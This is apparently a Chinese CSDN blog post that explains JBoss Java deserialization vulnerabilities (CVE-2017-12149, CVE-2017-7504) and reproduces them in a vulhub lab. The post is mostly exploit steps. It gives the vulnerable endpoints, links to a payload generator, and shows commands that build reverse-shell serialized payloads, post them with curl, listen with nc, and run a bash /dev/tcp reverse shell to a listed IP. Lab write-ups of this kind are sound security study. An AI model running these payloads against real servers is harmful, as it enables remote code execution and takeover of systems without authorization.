JBoss反序列化

最新推荐文章于 2023-09-21 10:49:19 发布
最新推荐文章于 2023-09-21 10:49:19 发布
阅读量2k 收藏 7
点赞数 2
分类专栏: 渗透测试篇 文章标签: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41438728/article/details/109720009
版权

JBoss反序列化

基础知识

序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。

Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。

形成漏洞的根源在于类ObjectInputStream在反序列化时,没有对生成的对象的类型做限制。

原理

Java序列化,简而言之就是把java对象转化为字节序列的过程。而反序列话则是再把字节序列恢复为java对象的过程,然而就在这一转一变得过程中,程序员的过滤不严格,就可以导致攻击者恶意构造的代码的实现。
举个简单的例子,jboss的反序列化漏洞出现在jboss\server\all\deploy\httpha-invoker.sar\invoker.war\WEB-INF\classes\org\jboss\invocation\http\servlet目录下的ReadOnlyAccessFilter.class文件中的doFilter中。

public void doFilter(ServletRequest request,ServletResponse response,FilterChain chain)
  throw IOException,ServletException
{
  HttpServletRequest httpRequest=(HttpServletRequest)request;
  Principal user=httpRequest.getUserPrincipal();
  if((user=null)&&(this.readOnlyContext!=null))
  { 
    ServletInputStream sis=request.getInputStream();
    ObjectInputStream ois=new ObjectInputStream(sis);
    MarshalledInvocation mi=null;
    try
    {
      mi=(MarshalledInvocation)ois.readObject();
    } 
    catch(ClassNotFountException e)
    {
      throw new ServletException("Failed to read MarshalledInvocation",e);
    }
    request.serAttribute("MarshalledInvocation",mi);

    mi.setMethodMap(this.namingMethodMap);
    Method m=mi.getMethod();
    if(m!=null){
      validateAccess(m,mi)
    }
  }
  chain.doFilter(request,response);
}

CVE-2017-12149

漏洞影响5.x和6.x版本的JBOSSAS。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。

CVE-2017-7504

JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

验证

可以使用检测工具检测
在这里插入图片描述

复现思路

1.云主机的内置vulhub8080端口搭建实验靶场
2. 加载攻击脚本,编译并生成序列化数据
3. 序列化恶意数据至文件,将该文件作为请求数据主体发送数据包
4.云主机开启端口监听反弹过来的shell

1.CVE-2017-12149利用路径是/invoker/readonly
2.CVE-2017-7504利用路径是/jbossmq-httpil/HTTPServerILServlet
3.CVE-2015-7501的利用路径是/invoker/JMXInvokerServlet

复现-CVE-2017-12149

本文使用的脚本下载地址:
https://github.com/joaomatosf/JavaDeserH2HC
影响范围
JBoss 5.0.0~5.2.2
1、特征检测
端口扫描:
// 使用nmap扫描端口,检测是否开启该服务:
nmap -p 1-65535 -A 目标 IP
在这里插入图片描述2、启动vulhub的jboss,访问http://your-IP:8080/
在这里插入图片描述
目录拼接: http://your-IP:8080/invoker/readonly
在这里插入图片描述
脚本下载地址:

https://github.com/joaomatosf/JavaDeserH2HC
编译并生成序列化数据:

// 执行下面命令会生成相应的.class文件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

在这里插入图片描述
ser全称serialize,序列化恶意数据至文件:

// 执行下面命令会生成相应的.ser文件
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.107.139:8888

在这里插入图片描述
将该文件作为请求数据主体发送数据包,–data-binary 意为以二进制的方式post数据:

// curl 这个二进制文件发送payload
curl http://192.168.107.142:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

在这里插入图片描述
监听端口:

// 开启监听端口
nc -lvnp 6666

在这里插入图片描述
成功反弹(注:这里出现connect to [X.X.X.X] from x.x.x.x 后就可以直接执行命令了)

复现-CVE-2017-7504

影响范围:JBoss AS 4.x及之前版本。
漏洞原理:JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
下载利用工具:http://scan.javasec.cn/java/JavaDeserH2HC.zip
1、启动vulhub的jboss,访问http://your-ip:8080/
在这里插入图片描述

2、进行文件编译
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
在这里插入图片描述
3、先开启nc监听5678端口
在这里插入图片描述
4、java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap “bash -i >& /dev/tcp/150.158.193.92/5678 0>&1”
在这里插入图片描述
5、curl提交POC
curl http://150.158.193.92:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser
在这里插入图片描述
6、反弹成功!
在这里插入图片描述

德古拉的杂货铺
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java序列工具
11-21
java序列工具,覆盖jboss、weblogic、websphere。
[Vulfocus解题系列] jboss 序列 (CVE-2017-7504)
00勇士王子的博客
07-11 931
漏洞介绍 名称: jboss 序列 (CVE-2017-7504) 描述: Red Hat JBoss Application Server(AS,也称WildFly)是美国红帽(Red Hat)公司的一款基于JavaEE的开源的应用服务器,它具有启动超快、轻量、模块设计、热部署和并行部署、简洁管理、域管理及第一类元件等特性。 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件
java序列漏洞 https服务_JBoss “Java 序列”过程远程命令执行漏洞
weixin_34618077的博客
02-17 161
### 漏洞原理序列是指特定语言中将传递的对象序列数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例操作用于恢复之前序列时的对象。在原博文所提到的那些 Java 应用里都有特定的接口用于传递序列对象数据,而在序列时并没有限制实例对象的类型,导致可以任意构造应用中已经包含的对象利用序列操作进行实例。Java 在进行序列操作的时候会使用 Obje...
Jboss序列漏洞的复现与原理
LJH1999ZN的博客
03-29 4603
一、什么是Jboss Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。 二、Jboss的历史漏洞 1.jboss序列漏洞,CVE-2017-7504 漏洞存在/jbossmq-httpi
Jboss中间件两大漏洞分析
fansenliangren的博客
12-28 1464
序列就是把对象转换成字节流,便于保存在内存、文件、数据库中;序列即逆过程,由字节流还原成对象。Java中的ObjectOutputStream类的writeObject()方法可以实现序列,ObjectInputStream类的readObject()方法用于序列
hw蓝队初级面试总结
热门推荐
G208_522的博客
05-27 1万+
1、sql注入原理、分类、绕过 原理:产生sql注入漏洞主要因为没有对接受到的参数进行过滤、验证和处理直接拼接到了sql语句中,然后直接执行该sql语句,这样就会导致恶意用户传入一些精心构造的sql代码,与后台sql语句拼接后形成完整的sql语句执行,达到攻击者的目的。 分类:我们可以把sql注入直接的分为字符型和数字型,主要特点就是在进行sql注入的时候是否需要闭合传参的单引号,不需要闭合说明是数值型,之就是字符型;还可以将sql注入分为有回显的注入和无回显的注入,无回显的注入又别称为盲注,盲注有三大
jboss序列漏洞
weixin_48776804的博客
05-17 1217
jboss序列漏洞
JBoss简介
守拙的博客
02-16 4511
JBoss简介
java序列漏洞利用工具Jboss&WebLogic;.rar
07-23
jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 弹shell部分更完美,不再加载远程war包,直接发包完成弹。 4. jboss回显执行命令部分利用异常抛出...
Jboss Application Server序列命令执行漏洞利用工具(CVE-2017-12149)
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用。
JBOSS序列漏洞工具
03-28
通过JBOSS4 commons-collections.jar包的序列类InvokerTransformer, InstantiateFactory 和 InstantiateTransfromer class 文件可以远程操控服务器
Java序列攻击
01-21
Java 序列攻击漏洞由FoxGlove 的近的一篇博文爆出,该漏洞可以被黑客利用向服务器上传恶意脚本,或者远程执行命令。  由于目前发现该漏洞存在于 Apache commons-collections, Apache xalan 和 Groovy 包中,...
JBoss 相关漏洞复现及利用
最新发布
weixin_45908624的博客
09-21 929
JBoss Application Server 相关漏洞复现
jboss集群session复制原理
wangsmart0902的博客
12-19 1444
test1
Jboss(CVE-2017-12149)序列命令执行漏洞
weixin_51151498的博客
12-11 1935
Jboss(CVE-2017-12149)序列命令执行漏洞
Jboss序列漏洞复现
weixin_53747497的博客
02-24 457
JBoss 在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们 可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。Java序列错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中 没有进行任何安全检查的情况下尝试将来自客户端的数据流进行序列,请求中读取了用户传入的对象,从而导致了漏洞。
日均 5 亿查询量的京东订单中心,为什么舍 MySQL 用 ES ?
芋艿V
09-30 310
点击上方“芋道源码”,选择“设为星标”做积极的人,而不是积极废人!源码精品专栏原创 | Java 2019 超神之路,很肝~中文详细注释的开源项目RPC 框架 Dubbo 源码解析网络...
web渗透工程师——初级面试总结
m0_61506558的博客
10-12 2502
根据sql注入各自的特点可以分为联合注入、二次注入、宽字节注入、堆叠注入等,根据http报文中的不同位置可以有cookie注入、referer注入、x-forwarded-for注入等。产生sql注入漏洞主要因为没有对接受到的参数进行过滤、验证和处理直接拼接到了sql语句中,然后直接执行该sql语句,这样就会导致恶意用户传入一些精心构造的sql代码,与后台sql语句拼接后形成完整的sql语句执行,达到攻击者的目的。大小写绕过 、编码绕过、注释绕过、关键字/关键函数替换、参数污染、缓存区溢出、特殊符号。
drozer安全评估框架基础使用技法
weixin_41438728的博客
04-13 7997
drozer安全评估框架基础使用技法 ----桂亚平20220331整理 1 测试前准备 1.1 安卓系统 准备环境:安卓模拟器6.5.0.1版-夜神模拟器 1.2 adb(Android Debug Bridge)工具 adb(Android Debug Bridge),android sdk中的一个工具,分为客户端(电脑)和服务端(android手机或者模拟器),可以用来直接操作管理android模拟器或者真实的android设备。 测试环境adb的路径:D:\Program Files\Nox
weblogic序列原理
06-09
WebLogic序列漏洞是指通过WebLogic服务器中的T3协议进行攻击,攻击者可以利用该漏洞在未授权的情况下远程执行任意代码,从而导致服务器被完全控制。 该漏洞的具体原理是,WebLogic服务器在处理T3协议请求时,会将请求中的对象序列,通过序列后的对象来执行相应的操作。攻击者可以构造恶意的序列数据,通过该漏洞将其传递给服务器,从而执行任意代码。 攻击者可以使用一些常见的Java开发框架,如Apache Commons Collection、JBoss、Jenkins,通过构造恶意的序列数据,来利用该漏洞实现远程代码执行。因此,建议在使用WebLogic服务器时,及时升级到最新版本,同时限制WebLogic服务器的T3协议访问权限,以减少安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值